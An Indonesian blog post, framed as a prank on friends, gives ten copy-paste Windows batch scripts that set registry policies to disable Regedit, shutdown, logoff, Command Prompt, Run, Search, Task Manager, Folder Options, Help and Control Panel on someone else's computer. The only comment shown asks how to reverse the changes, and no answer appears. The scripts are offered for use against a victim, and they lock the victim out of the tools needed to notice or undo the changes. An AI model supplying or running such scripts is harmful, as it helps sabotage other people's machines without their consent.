//
you're reading...
tips and trick

Trik notepad disable fungsi komputer format bat


Sembunyi fungsi penting komputer  menggunakan notepad wow apa maksudnya,  ya  hanya di gunakan untuk menjahili teman aja, mana tau teman kita terjahili karena ulah dan aksi kita , ya kan.  He jahat kali, itu sih menurut dia, kalau menurut kita ya ngak apa-apa kan..lagian juga untuk menyadarkan dia agar selalu berbuat baik kepada kita,, hehehehe

Beberapa fungsi komputer  yang akan kita hilangkan mengunakan notepad adalah

1. Disable regedit nya terlebih dahulu,  biar nanti regedit nya ngak bisa kebuka
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f
Save as beri nama disbleregedit.bat
2. Disable  shutdown komputer
Biar komputer nya terus hidup
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f 
Save as beri nama ngak ada mati manual.bat
3. Disable log of komputer

Buat log of komputer mati
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogoff /t REG_DWORD /d 1 /f
Save as beri nama disable logoff.bat
4. Disable cmd komputer

Agar cmd ngak jalan, biar attrib jadi berantakan
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f
Save as beri nama disable cmd.bat
5. Hilangkan run pada star menu

Mehilangkan fungsi run di star menu
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
Save as beri nama norun.bat
6. Hilangkan search pada star menu

Hialang kan mesin pencarian windows pada star menu
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
Save as beri nama nofind.bat
7. Disable task manager

Sangat perlu , karena task manager ini di gunakan untuk mengetahui apa-apa saja proses yang sedang berjalan pada komputer kita
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Save as beri nama notaskmanager.bat
8. Hilangkan folder option pada komputer

Agar ngak bisa nyari dimana letak data yang kita buat
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
Save as beri nama nofolderoption.bat
9. Menyembunyikan Help And Support

Kalau yang suka cai tau apa masalah komputer nya, pasti cari tau lewat panduan ini jadi kita disable juga seperti yang lainya Scriptnya kayak gini,
tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMHelp
/t REG_DWORD /d 1 /f
Save as beri nama tidak ada bantuan.bat
10. Menyembunyikan contol panel pada lomputer

agar ngak bisa masuk control panel
disable juga seperti yang lainya
Scriptnya kayak gini, tulis di notepad ya atau di copy paste aja
@Echo off
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel
/t REG_DWORD /d 1 /f
Save as beri nama tidak disablecontrolpanel.bat

Discussion

2 thoughts on “Trik notepad disable fungsi komputer format bat

  1. kalo mengembalikan seperti semulanya gimana gan

    Posted by ankoku_phoenix | October 16, 2012, 9:00 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Twitter Updates

Biografi Nama Joko Widodo mulai menjadi sorotan ketika terpilih menjadi Walikota Surakarta....... Baca selengkapnya »

Profil Basuki Tjahaja Purnama atau yang akrab dengan nama Ahok adalah politikus asal Belitung ....... Baca selengkapnya »

Profil Chirul Tanjung (CT) adalah konglomerat Indonesia yang namanya berada di urutan 937 dari 1000 orang terkaya di dunia....... Baca selengkapnya »

Profil Dahlan Iskan lahir di Magetan pada tanggal 17 Agustus 1951....... Baca selengkapnya »

Blog Stats

  • 77,365 hits

Categories

translator

English Chinese Spain Germany

LIKE # Dapatkan Berita Terupdate

pagerank

Google PageRank Checker Powered by  MyPagerank.Net Page Rank Checker
SEO Stats powered by MyPagerank.Net

Join 11 other followers

SITE STATS

onesetia82
%d bloggers like this: